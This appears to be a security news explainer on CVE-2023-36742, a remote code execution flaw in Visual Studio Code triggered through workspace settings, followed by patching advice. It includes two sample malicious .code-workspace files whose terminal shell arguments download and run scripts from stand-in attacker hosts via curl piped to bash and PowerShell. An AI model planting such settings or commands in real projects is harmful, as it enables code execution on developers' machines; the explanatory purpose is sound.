CVE CyberSecurity Database News

CVE-2023-36742 - Visual Studio Code Remote Code Execution Explained (With Exploit Details)

Poster -

Discovering security holes in tools millions use is always a wake-up call. In 2023, one such hole was found in Visual Studio Code - the world's most popular code editor. This post explains CVE-2023-36742 with code snippets, simple language, links, and a clear exploit breakdown.

What Is CVE-2023-36742?

CVE-2023-36742 is a Critical Remote Code Execution (RCE) vulnerability found in Visual Studio Code (VS Code). Because a lot of programmers use VS Code for writing and debugging code, a bug like this can open the door for hackers to run malicious code on your computer just by tricking you into opening a specially crafted file or project, without you even knowing.

Short Version:
A hacker can take control of your computer through VS Code if you open a malicious workspace or file.

Where Did The Bug Come From?

This vulnerability was first reported by Microsoft in their monthly Patch Tuesday for September 2023. When handling workspace configurations, VS Code failed to properly sanitize user-controlled input, especially in .code-workspace files, extension activation events, or certain project files. This allowed attackers to inject code that would run automatically.

Original References

- Microsoft Security Update Guide (CVE-2023-36742)
- NVD Details

Realistic Exploit Scenario

Say, you're looking for a new VS Code theme or extension. You download what looks like a legit .code-workspace sample from a forum. However, it contains this (simplified example):

{
  "folders": [
    { "path": "." }
  ],
  "settings": {
    "terminal.integrated.shellArgs.linux": [
      "-c",
      "curl http://evil.com/x.sh | bash"
    ]
  }
}

When VS Code opens this workspace file, if your version is affected and you have the right OS/settings, the shell args could get passed to an integrated terminal. This triggers that nasty curl command, which downloads and executes a shell script from the attacker's server.

malicious.code-workspace

{
  "folders": [],
  "settings": {
    "terminal.integrated.shellArgs.windows": [
        "/c",
        "powershell -Command \"Invoke-WebRequest http://evil.attacker/download.ps1 -OutFile C:\\temp\\hello.ps1; Start-Process C:\\temp\\hello.ps1\""
    ]
  }
}

What happens:
When this workspace is opened, the malicious PowerShell command is injected into the terminal without user knowledge or approval (on vulnerable VS Code versions).

Upgrade VS Code

Microsoft released a patched version almost immediately. Make sure you are on VS Code 1.82.1 (September 2023) or later.

Use Security Extensions

Extensions like GitHub Codespaces Security can add extra protection.

Technical Deep Dive

- The core issue lies in how VS Code handled certain configuration fields (such as terminal.integrated.shellArgs) within workspace settings.

Improper input validation let attackers escape from text fields into shell execution.

- In some cases, extensions with low permissions could trigger higher-privileged actions due to trust model weaknesses.

For security researchers, the patch diff shows how Microsoft now sanitizes commands and scripts passed from workspace configs.

Summary

CVE-2023-36742 is a serious bug in VS Code that let hackers run their code on your computer through a booby-trapped workspace file. If you use VS Code, update right away, and never open random projects from strangers.

Stay secure and update often!

Further Reading:
- Microsoft Security Response Center Blog
- CVE-2023-36742 official advisory
- How VS Code workspace trust works


*© 2024 - Security Explained, Simple & Straight.*

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC